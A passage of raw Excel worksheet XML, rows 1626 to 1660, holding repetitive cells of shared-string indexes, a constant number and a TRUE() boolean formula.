      <c r="D1626" t="s">
        <v>1826</v>
      </c>
      <c r="E1626" t="s">
        <v>1227</v>
      </c>
      <c r="F1626">
        <v>29117301</v>
      </c>
      <c r="G1626" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1626" t="s">
        <v>1962</v>
      </c>
      <c r="K1626">
        <v>0</v>
      </c>
      <c r="L1626" t="s">
        <v>98</v>
      </c>
      <c r="R1626" t="s">
        <v>5</v>
      </c>
      <c r="S1626" t="s">
        <v>1229</v>
      </c>
      <c r="T1626" t="s">
        <v>7</v>
      </c>
      <c r="U1626" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1627" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1627" s="1">
        <v>17995</v>
      </c>
      <c r="B1627" t="s">
        <v>0</v>
      </c>
      <c r="C1627" t="s">
        <v>78</v>
      </c>
      <c r="D1627" t="s">
        <v>1826</v>
      </c>
      <c r="E1627" t="s">
        <v>1227</v>
      </c>
      <c r="F1627">
        <v>29117301</v>
      </c>
      <c r="G1627" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1627" t="s">
        <v>1963</v>
      </c>
      <c r="K1627">
        <v>0</v>
      </c>
      <c r="L1627" t="s">
        <v>98</v>
      </c>
      <c r="R1627" t="s">
        <v>5</v>
      </c>
      <c r="S1627" t="s">
        <v>1229</v>
      </c>
      <c r="T1627" t="s">
        <v>7</v>
      </c>
      <c r="U1627" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1628" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1628" s="1">
        <v>17996</v>
      </c>
      <c r="B1628" t="s">
        <v>0</v>
      </c>
      <c r="C1628" t="s">
        <v>1</v>
      </c>
      <c r="D1628" t="s">
        <v>1826</v>
      </c>
      <c r="E1628" t="s">
        <v>1227</v>
      </c>
      <c r="F1628">
        <v>29117301</v>
      </c>
      <c r="G1628" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1628" t="s">
        <v>1964</v>
      </c>
      <c r="K1628">
        <v>0</v>
      </c>
      <c r="L1628" t="s">
        <v>98</v>
      </c>
      <c r="R1628" t="s">
        <v>5</v>
      </c>
      <c r="S1628" t="s">
        <v>1229</v>
      </c>
      <c r="T1628" t="s">
        <v>7</v>
      </c>
      <c r="U1628" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1629" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1629" s="1">
        <v>17997</v>
      </c>
      <c r="B1629" t="s">
        <v>0</v>
      </c>
      <c r="C1629" t="s">
        <v>78</v>
      </c>
      <c r="D1629" t="s">
        <v>1826</v>
      </c>
      <c r="E1629" t="s">
        <v>1227</v>
      </c>
      <c r="F1629">
        <v>29117301</v>
      </c>
      <c r="G1629" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1629" t="s">
        <v>1965</v>
      </c>
      <c r="K1629">
        <v>0</v>
      </c>
      <c r="L1629" t="s">
        <v>98</v>
      </c>
      <c r="R1629" t="s">
        <v>5</v>
      </c>
      <c r="S1629" t="s">
        <v>1229</v>
      </c>
      <c r="T1629" t="s">
        <v>7</v>
      </c>
      <c r="U1629" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1630" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1630" s="1">
        <v>17998</v>
      </c>
      <c r="B1630" t="s">
        <v>0</v>
      </c>
      <c r="C1630" t="s">
        <v>78</v>
      </c>
      <c r="D1630" t="s">
        <v>1826</v>
      </c>
      <c r="E1630" t="s">
        <v>1227</v>
      </c>
      <c r="F1630">
        <v>29117301</v>
      </c>
      <c r="G1630" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1630" t="s">
        <v>1966</v>
      </c>
      <c r="K1630">
        <v>0</v>
      </c>
      <c r="L1630" t="s">
        <v>98</v>
      </c>
      <c r="R1630" t="s">
        <v>5</v>
      </c>
      <c r="S1630" t="s">
        <v>1229</v>
      </c>
      <c r="T1630" t="s">
        <v>7</v>
      </c>
      <c r="U1630" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1631" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1631" s="1">
        <v>17999</v>
      </c>
      <c r="B1631" t="s">
        <v>0</v>
      </c>
      <c r="C1631" t="s">
        <v>78</v>
      </c>
      <c r="D1631" t="s">
        <v>1826</v>
      </c>
      <c r="E1631" t="s">
        <v>1227</v>
      </c>
      <c r="F1631">
        <v>29117301</v>
      </c>
      <c r="G1631" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1631" t="s">
        <v>1967</v>
      </c>
      <c r="K1631">
        <v>0</v>
      </c>
      <c r="L1631" t="s">
        <v>98</v>
      </c>
      <c r="R1631" t="s">
        <v>5</v>
      </c>
      <c r="S1631" t="s">
        <v>1229</v>
      </c>
      <c r="T1631" t="s">
        <v>7</v>
      </c>
      <c r="U1631" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1632" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1632" s="1">
        <v>18000</v>
      </c>
      <c r="B1632" t="s">
        <v>0</v>
      </c>
      <c r="C1632" t="s">
        <v>1</v>
      </c>
      <c r="D1632" t="s">
        <v>1826</v>
      </c>
      <c r="E1632" t="s">
        <v>1227</v>
      </c>
      <c r="F1632">
        <v>29117301</v>
      </c>
      <c r="G1632" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1632" t="s">
        <v>1968</v>
      </c>
      <c r="K1632">
        <v>0</v>
      </c>
      <c r="L1632" t="s">
        <v>98</v>
      </c>
      <c r="R1632" t="s">
        <v>5</v>
      </c>
      <c r="S1632" t="s">
        <v>1229</v>
      </c>
      <c r="T1632" t="s">
        <v>7</v>
      </c>
      <c r="U1632" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1633" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1633" s="1">
        <v>18001</v>
      </c>
      <c r="B1633" t="s">
        <v>0</v>
      </c>
      <c r="C1633" t="s">
        <v>78</v>
      </c>
      <c r="D1633" t="s">
        <v>1826</v>
      </c>
      <c r="E1633" t="s">
        <v>1227</v>
      </c>
      <c r="F1633">
        <v>29117301</v>
      </c>
      <c r="G1633" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1633" t="s">
        <v>1969</v>
      </c>
      <c r="K1633">
        <v>0</v>
      </c>
      <c r="L1633" t="s">
        <v>98</v>
      </c>
      <c r="R1633" t="s">
        <v>5</v>
      </c>
      <c r="S1633" t="s">
        <v>1229</v>
      </c>
      <c r="T1633" t="s">
        <v>7</v>
      </c>
      <c r="U1633" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1634" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1634" s="1">
        <v>18002</v>
      </c>
      <c r="B1634" t="s">
        <v>0</v>
      </c>
      <c r="C1634" t="s">
        <v>78</v>
      </c>
      <c r="D1634" t="s">
        <v>1826</v>
      </c>
      <c r="E1634" t="s">
        <v>1227</v>
      </c>
      <c r="F1634">
        <v>29117301</v>
      </c>
      <c r="G1634" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1634" t="s">
        <v>1970</v>
      </c>
      <c r="K1634">
        <v>0</v>
      </c>
      <c r="L1634" t="s">
        <v>98</v>
      </c>
      <c r="R1634" t="s">
        <v>5</v>
      </c>
      <c r="S1634" t="s">
        <v>1229</v>
      </c>
      <c r="T1634" t="s">
        <v>7</v>
      </c>
      <c r="U1634" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1635" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1635" s="1">
        <v>18003</v>
      </c>
      <c r="B1635" t="s">
        <v>0</v>
      </c>
      <c r="C1635" t="s">
        <v>78</v>
      </c>
      <c r="D1635" t="s">
        <v>1826</v>
      </c>
      <c r="E1635" t="s">
        <v>1227</v>
      </c>
      <c r="F1635">
        <v>29117301</v>
      </c>
      <c r="G1635" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1635" t="s">
        <v>1971</v>
      </c>
      <c r="K1635">
        <v>0</v>
      </c>
      <c r="L1635" t="s">
        <v>98</v>
      </c>
      <c r="R1635" t="s">
        <v>5</v>
      </c>
      <c r="S1635" t="s">
        <v>1229</v>
      </c>
      <c r="T1635" t="s">
        <v>7</v>
      </c>
      <c r="U1635" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1636" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1636" s="1">
        <v>18004</v>
      </c>
      <c r="B1636" t="s">
        <v>0</v>
      </c>
      <c r="C1636" t="s">
        <v>78</v>
      </c>
      <c r="D1636" t="s">
        <v>1826</v>
      </c>
      <c r="E1636" t="s">
        <v>1227</v>
      </c>
      <c r="F1636">
        <v>29117301</v>
      </c>
      <c r="G1636" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1636" t="s">
        <v>1972</v>
      </c>
      <c r="K1636">
        <v>0</v>
      </c>
      <c r="L1636" t="s">
        <v>98</v>
      </c>
      <c r="R1636" t="s">
        <v>5</v>
      </c>
      <c r="S1636" t="s">
        <v>1229</v>
      </c>
      <c r="T1636" t="s">
        <v>7</v>
      </c>
      <c r="U1636" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1637" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1637" s="1">
        <v>18005</v>
      </c>
      <c r="B1637" t="s">
        <v>0</v>
      </c>
      <c r="C1637" t="s">
        <v>78</v>
      </c>
      <c r="D1637" t="s">
        <v>1826</v>
      </c>
      <c r="E1637" t="s">
        <v>1227</v>
      </c>
      <c r="F1637">
        <v>29117301</v>
      </c>
      <c r="G1637" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1637" t="s">
        <v>1973</v>
      </c>
      <c r="K1637">
        <v>0</v>
      </c>
      <c r="L1637" t="s">
        <v>98</v>
      </c>
      <c r="R1637" t="s">
        <v>5</v>
      </c>
      <c r="S1637" t="s">
        <v>1229</v>
      </c>
      <c r="T1637" t="s">
        <v>7</v>
      </c>
      <c r="U1637" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1638" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1638" s="1">
        <v>18006</v>
      </c>
      <c r="B1638" t="s">
        <v>0</v>
      </c>
      <c r="C1638" t="s">
        <v>78</v>
      </c>
      <c r="D1638" t="s">
        <v>1826</v>
      </c>
      <c r="E1638" t="s">
        <v>1227</v>
      </c>
      <c r="F1638">
        <v>29117301</v>
      </c>
      <c r="G1638" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1638" t="s">
        <v>1974</v>
      </c>
      <c r="K1638">
        <v>0</v>
      </c>
      <c r="L1638" t="s">
        <v>98</v>
      </c>
      <c r="R1638" t="s">
        <v>5</v>
      </c>
      <c r="S1638" t="s">
        <v>1229</v>
      </c>
      <c r="T1638" t="s">
        <v>7</v>
      </c>
      <c r="U1638" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1639" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1639" s="1">
        <v>18007</v>
      </c>
      <c r="B1639" t="s">
        <v>0</v>
      </c>
      <c r="C1639" t="s">
        <v>78</v>
      </c>
      <c r="D1639" t="s">
        <v>1826</v>
      </c>
      <c r="E1639" t="s">
        <v>1227</v>
      </c>
      <c r="F1639">
        <v>29117301</v>
      </c>
      <c r="G1639" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1639" t="s">
        <v>1975</v>
      </c>
      <c r="K1639">
        <v>0</v>
      </c>
      <c r="L1639" t="s">
        <v>98</v>
      </c>
      <c r="R1639" t="s">
        <v>5</v>
      </c>
      <c r="S1639" t="s">
        <v>1229</v>
      </c>
      <c r="T1639" t="s">
        <v>7</v>
      </c>
      <c r="U1639" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1640" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1640" s="1">
        <v>18008</v>
      </c>
      <c r="B1640" t="s">
        <v>0</v>
      </c>
      <c r="C1640" t="s">
        <v>78</v>
      </c>
      <c r="D1640" t="s">
        <v>1826</v>
      </c>
      <c r="E1640" t="s">
        <v>1227</v>
      </c>
      <c r="F1640">
        <v>29117301</v>
      </c>
      <c r="G1640" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1640" t="s">
        <v>1976</v>
      </c>
      <c r="K1640">
        <v>0</v>
      </c>
      <c r="L1640" t="s">
        <v>98</v>
      </c>
      <c r="R1640" t="s">
        <v>5</v>
      </c>
      <c r="S1640" t="s">
        <v>1229</v>
      </c>
      <c r="T1640" t="s">
        <v>7</v>
      </c>
      <c r="U1640" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1641" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1641" s="1">
        <v>18009</v>
      </c>
      <c r="B1641" t="s">
        <v>0</v>
      </c>
      <c r="C1641" t="s">
        <v>78</v>
      </c>
      <c r="D1641" t="s">
        <v>1826</v>
      </c>
      <c r="E1641" t="s">
        <v>1227</v>
      </c>
      <c r="F1641">
        <v>29117301</v>
      </c>
      <c r="G1641" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1641" t="s">
        <v>1977</v>
      </c>
      <c r="K1641">
        <v>0</v>
      </c>
      <c r="L1641" t="s">
        <v>98</v>
      </c>
      <c r="R1641" t="s">
        <v>5</v>
      </c>
      <c r="S1641" t="s">
        <v>1229</v>
      </c>
      <c r="T1641" t="s">
        <v>7</v>
      </c>
      <c r="U1641" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1642" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1642" s="1">
        <v>18010</v>
      </c>
      <c r="B1642" t="s">
        <v>0</v>
      </c>
      <c r="C1642" t="s">
        <v>78</v>
      </c>
      <c r="D1642" t="s">
        <v>1826</v>
      </c>
      <c r="E1642" t="s">
        <v>1227</v>
      </c>
      <c r="F1642">
        <v>29117301</v>
      </c>
      <c r="G1642" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1642" t="s">
        <v>1978</v>
      </c>
      <c r="K1642">
        <v>0</v>
      </c>
      <c r="L1642" t="s">
        <v>98</v>
      </c>
      <c r="R1642" t="s">
        <v>5</v>
      </c>
      <c r="S1642" t="s">
        <v>1229</v>
      </c>
      <c r="T1642" t="s">
        <v>7</v>
      </c>
      <c r="U1642" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1643" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1643" s="1">
        <v>18011</v>
      </c>
      <c r="B1643" t="s">
        <v>0</v>
      </c>
      <c r="C1643" t="s">
        <v>78</v>
      </c>
      <c r="D1643" t="s">
        <v>1826</v>
      </c>
      <c r="E1643" t="s">
        <v>1227</v>
      </c>
      <c r="F1643">
        <v>29117301</v>
      </c>
      <c r="G1643" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1643" t="s">
        <v>1979</v>
      </c>
      <c r="K1643">
        <v>0</v>
      </c>
      <c r="L1643" t="s">
        <v>98</v>
      </c>
      <c r="R1643" t="s">
        <v>5</v>
      </c>
      <c r="S1643" t="s">
        <v>1229</v>
      </c>
      <c r="T1643" t="s">
        <v>7</v>
      </c>
      <c r="U1643" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1644" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1644" s="1">
        <v>18012</v>
      </c>
      <c r="B1644" t="s">
        <v>0</v>
      </c>
      <c r="C1644" t="s">
        <v>78</v>
      </c>
      <c r="D1644" t="s">
        <v>1826</v>
      </c>
      <c r="E1644" t="s">
        <v>1227</v>
      </c>
      <c r="F1644">
        <v>29117301</v>
      </c>
      <c r="G1644" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1644" t="s">
        <v>1980</v>
      </c>
      <c r="K1644">
        <v>0</v>
      </c>
      <c r="L1644" t="s">
        <v>98</v>
      </c>
      <c r="R1644" t="s">
        <v>5</v>
      </c>
      <c r="S1644" t="s">
        <v>1229</v>
      </c>
      <c r="T1644" t="s">
        <v>7</v>
      </c>
      <c r="U1644" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1645" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1645" s="1">
        <v>18013</v>
      </c>
      <c r="B1645" t="s">
        <v>0</v>
      </c>
      <c r="C1645" t="s">
        <v>78</v>
      </c>
      <c r="D1645" t="s">
        <v>1826</v>
      </c>
      <c r="E1645" t="s">
        <v>1227</v>
      </c>
      <c r="F1645">
        <v>29117301</v>
      </c>
      <c r="G1645" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1645" t="s">
        <v>1981</v>
      </c>
      <c r="K1645">
        <v>0</v>
      </c>
      <c r="L1645" t="s">
        <v>98</v>
      </c>
      <c r="R1645" t="s">
        <v>5</v>
      </c>
      <c r="S1645" t="s">
        <v>1229</v>
      </c>
      <c r="T1645" t="s">
        <v>7</v>
      </c>
      <c r="U1645" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1646" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1646" s="1">
        <v>18014</v>
      </c>
      <c r="B1646" t="s">
        <v>0</v>
      </c>
      <c r="C1646" t="s">
        <v>78</v>
      </c>
      <c r="D1646" t="s">
        <v>1826</v>
      </c>
      <c r="E1646" t="s">
        <v>1227</v>
      </c>
      <c r="F1646">
        <v>29117301</v>
      </c>
      <c r="G1646" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1646" t="s">
        <v>1982</v>
      </c>
      <c r="K1646">
        <v>0</v>
      </c>
      <c r="L1646" t="s">
        <v>98</v>
      </c>
      <c r="R1646" t="s">
        <v>5</v>
      </c>
      <c r="S1646" t="s">
        <v>1229</v>
      </c>
      <c r="T1646" t="s">
        <v>7</v>
      </c>
      <c r="U1646" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1647" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1647" s="1">
        <v>18015</v>
      </c>
      <c r="B1647" t="s">
        <v>0</v>
      </c>
      <c r="C1647" t="s">
        <v>78</v>
      </c>
      <c r="D1647" t="s">
        <v>1826</v>
      </c>
      <c r="E1647" t="s">
        <v>1227</v>
      </c>
      <c r="F1647">
        <v>29117301</v>
      </c>
      <c r="G1647" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1647" t="s">
        <v>1983</v>
      </c>
      <c r="K1647">
        <v>0</v>
      </c>
      <c r="L1647" t="s">
        <v>98</v>
      </c>
      <c r="R1647" t="s">
        <v>5</v>
      </c>
      <c r="S1647" t="s">
        <v>1229</v>
      </c>
      <c r="T1647" t="s">
        <v>7</v>
      </c>
      <c r="U1647" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1648" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1648" s="1">
        <v>18016</v>
      </c>
      <c r="B1648" t="s">
        <v>0</v>
      </c>
      <c r="C1648" t="s">
        <v>78</v>
      </c>
      <c r="D1648" t="s">
        <v>1826</v>
      </c>
      <c r="E1648" t="s">
        <v>1227</v>
      </c>
      <c r="F1648">
        <v>29117301</v>
      </c>
      <c r="G1648" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1648" t="s">
        <v>1984</v>
      </c>
      <c r="K1648">
        <v>0</v>
      </c>
      <c r="L1648" t="s">
        <v>98</v>
      </c>
      <c r="R1648" t="s">
        <v>5</v>
      </c>
      <c r="S1648" t="s">
        <v>1229</v>
      </c>
      <c r="T1648" t="s">
        <v>7</v>
      </c>
      <c r="U1648" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1649" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1649" s="1">
        <v>18017</v>
      </c>
      <c r="B1649" t="s">
        <v>0</v>
      </c>
      <c r="C1649" t="s">
        <v>78</v>
      </c>
      <c r="D1649" t="s">
        <v>1826</v>
      </c>
      <c r="E1649" t="s">
        <v>1227</v>
      </c>
      <c r="F1649">
        <v>29117301</v>
      </c>
      <c r="G1649" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1649" t="s">
        <v>1985</v>
      </c>
      <c r="K1649">
        <v>0</v>
      </c>
      <c r="L1649" t="s">
        <v>98</v>
      </c>
      <c r="R1649" t="s">
        <v>5</v>
      </c>
      <c r="S1649" t="s">
        <v>1229</v>
      </c>
      <c r="T1649" t="s">
        <v>7</v>
      </c>
      <c r="U1649" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1650" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1650" s="1">
        <v>18018</v>
      </c>
      <c r="B1650" t="s">
        <v>0</v>
      </c>
      <c r="C1650" t="s">
        <v>78</v>
      </c>
      <c r="D1650" t="s">
        <v>1826</v>
      </c>
      <c r="E1650" t="s">
        <v>1227</v>
      </c>
      <c r="F1650">
        <v>29117301</v>
      </c>
      <c r="G1650" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1650" t="s">
        <v>1986</v>
      </c>
      <c r="K1650">
        <v>0</v>
      </c>
      <c r="L1650" t="s">
        <v>98</v>
      </c>
      <c r="R1650" t="s">
        <v>5</v>
      </c>
      <c r="S1650" t="s">
        <v>1229</v>
      </c>
      <c r="T1650" t="s">
        <v>7</v>
      </c>
      <c r="U1650" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1651" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1651" s="1">
        <v>18019</v>
      </c>
      <c r="B1651" t="s">
        <v>0</v>
      </c>
      <c r="C1651" t="s">
        <v>78</v>
      </c>
      <c r="D1651" t="s">
        <v>1826</v>
      </c>
      <c r="E1651" t="s">
        <v>1227</v>
      </c>
      <c r="F1651">
        <v>29117301</v>
      </c>
      <c r="G1651" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1651" t="s">
        <v>1987</v>
      </c>
      <c r="K1651">
        <v>0</v>
      </c>
      <c r="L1651" t="s">
        <v>98</v>
      </c>
      <c r="R1651" t="s">
        <v>5</v>
      </c>
      <c r="S1651" t="s">
        <v>1229</v>
      </c>
      <c r="T1651" t="s">
        <v>7</v>
      </c>
      <c r="U1651" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1652" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1652" s="1">
        <v>18020</v>
      </c>
      <c r="B1652" t="s">
        <v>0</v>
      </c>
      <c r="C1652" t="s">
        <v>78</v>
      </c>
      <c r="D1652" t="s">
        <v>1826</v>
      </c>
      <c r="E1652" t="s">
        <v>1227</v>
      </c>
      <c r="F1652">
        <v>29117301</v>
      </c>
      <c r="G1652" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1652" t="s">
        <v>1988</v>
      </c>
      <c r="K1652">
        <v>0</v>
      </c>
      <c r="L1652" t="s">
        <v>98</v>
      </c>
      <c r="R1652" t="s">
        <v>5</v>
      </c>
      <c r="S1652" t="s">
        <v>1229</v>
      </c>
      <c r="T1652" t="s">
        <v>7</v>
      </c>
      <c r="U1652" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1653" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1653" s="1">
        <v>18021</v>
      </c>
      <c r="B1653" t="s">
        <v>0</v>
      </c>
      <c r="C1653" t="s">
        <v>78</v>
      </c>
      <c r="D1653" t="s">
        <v>1826</v>
      </c>
      <c r="E1653" t="s">
        <v>1227</v>
      </c>
      <c r="F1653">
        <v>29117301</v>
      </c>
      <c r="G1653" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1653" t="s">
        <v>1989</v>
      </c>
      <c r="K1653">
        <v>0</v>
      </c>
      <c r="L1653" t="s">
        <v>98</v>
      </c>
      <c r="R1653" t="s">
        <v>5</v>
      </c>
      <c r="S1653" t="s">
        <v>1229</v>
      </c>
      <c r="T1653" t="s">
        <v>7</v>
      </c>
      <c r="U1653" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1654" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1654" s="1">
        <v>18022</v>
      </c>
      <c r="B1654" t="s">
        <v>0</v>
      </c>
      <c r="C1654" t="s">
        <v>78</v>
      </c>
      <c r="D1654" t="s">
        <v>1826</v>
      </c>
      <c r="E1654" t="s">
        <v>1227</v>
      </c>
      <c r="F1654">
        <v>29117301</v>
      </c>
      <c r="G1654" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1654" t="s">
        <v>1990</v>
      </c>
      <c r="K1654">
        <v>0</v>
      </c>
      <c r="L1654" t="s">
        <v>98</v>
      </c>
      <c r="R1654" t="s">
        <v>5</v>
      </c>
      <c r="S1654" t="s">
        <v>1229</v>
      </c>
      <c r="T1654" t="s">
        <v>7</v>
      </c>
      <c r="U1654" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1655" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1655" s="1">
        <v>18023</v>
      </c>
      <c r="B1655" t="s">
        <v>0</v>
      </c>
      <c r="C1655" t="s">
        <v>78</v>
      </c>
      <c r="D1655" t="s">
        <v>1826</v>
      </c>
      <c r="E1655" t="s">
        <v>1227</v>
      </c>
      <c r="F1655">
        <v>29117301</v>
      </c>
      <c r="G1655" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1655" t="s">
        <v>1991</v>
      </c>
      <c r="K1655">
        <v>0</v>
      </c>
      <c r="L1655" t="s">
        <v>98</v>
      </c>
      <c r="R1655" t="s">
        <v>5</v>
      </c>
      <c r="S1655" t="s">
        <v>1229</v>
      </c>
      <c r="T1655" t="s">
        <v>7</v>
      </c>
      <c r="U1655" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1656" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1656" s="1">
        <v>18024</v>
      </c>
      <c r="B1656" t="s">
        <v>0</v>
      </c>
      <c r="C1656" t="s">
        <v>78</v>
      </c>
      <c r="D1656" t="s">
        <v>1826</v>
      </c>
      <c r="E1656" t="s">
        <v>1227</v>
      </c>
      <c r="F1656">
        <v>29117301</v>
      </c>
      <c r="G1656" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1656" t="s">
        <v>1992</v>
      </c>
      <c r="K1656">
        <v>0</v>
      </c>
      <c r="L1656" t="s">
        <v>98</v>
      </c>
      <c r="R1656" t="s">
        <v>5</v>
      </c>
      <c r="S1656" t="s">
        <v>1229</v>
      </c>
      <c r="T1656" t="s">
        <v>7</v>
      </c>
      <c r="U1656" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1657" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1657" s="1">
        <v>18025</v>
      </c>
      <c r="B1657" t="s">
        <v>0</v>
      </c>
      <c r="C1657" t="s">
        <v>78</v>
      </c>
      <c r="D1657" t="s">
        <v>1826</v>
      </c>
      <c r="E1657" t="s">
        <v>1227</v>
      </c>
      <c r="F1657">
        <v>29117301</v>
      </c>
      <c r="G1657" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1657" t="s">
        <v>1993</v>
      </c>
      <c r="K1657">
        <v>0</v>
      </c>
      <c r="L1657" t="s">
        <v>98</v>
      </c>
      <c r="R1657" t="s">
        <v>5</v>
      </c>
      <c r="S1657" t="s">
        <v>1229</v>
      </c>
      <c r="T1657" t="s">
        <v>7</v>
      </c>
      <c r="U1657" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1658" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1658" s="1">
        <v>18026</v>
      </c>
      <c r="B1658" t="s">
        <v>0</v>
      </c>
      <c r="C1658" t="s">
        <v>78</v>
      </c>
      <c r="D1658" t="s">
        <v>1826</v>
      </c>
      <c r="E1658" t="s">
        <v>1227</v>
      </c>
      <c r="F1658">
        <v>29117301</v>
      </c>
      <c r="G1658" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1658" t="s">
        <v>1994</v>
      </c>
      <c r="K1658">
        <v>0</v>
      </c>
      <c r="L1658" t="s">
        <v>98</v>
      </c>
      <c r="R1658" t="s">
        <v>5</v>
      </c>
      <c r="S1658" t="s">
        <v>1229</v>
      </c>
      <c r="T1658" t="s">
        <v>7</v>
      </c>
      <c r="U1658" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1659" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1659" s="1">
        <v>18027</v>
      </c>
      <c r="B1659" t="s">
        <v>0</v>
      </c>
      <c r="C1659" t="s">
        <v>78</v>
      </c>
      <c r="D1659" t="s">
        <v>1826</v>
      </c>
      <c r="E1659" t="s">
        <v>1227</v>
      </c>
      <c r="F1659">
        <v>29117301</v>
      </c>
      <c r="G1659" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1659" t="s">
        <v>1995</v>
      </c>
      <c r="K1659">
        <v>0</v>
      </c>
      <c r="L1659" t="s">
        <v>98</v>
      </c>
      <c r="R1659" t="s">
        <v>5</v>
      </c>
      <c r="S1659" t="s">
        <v>1229</v>
      </c>
      <c r="T1659" t="s">
        <v>7</v>
      </c>
      <c r="U1659" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1660" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1660" s="1">
        <v>18028</v>
      </c>
      <c r="B1660" t="s">
        <v>0</v>
      </c>
      <c r="C1660" t="s">
        <v>78</v>
      </c>
      <c r="D1660" t="s">
        <v>1826</v>
      </c>
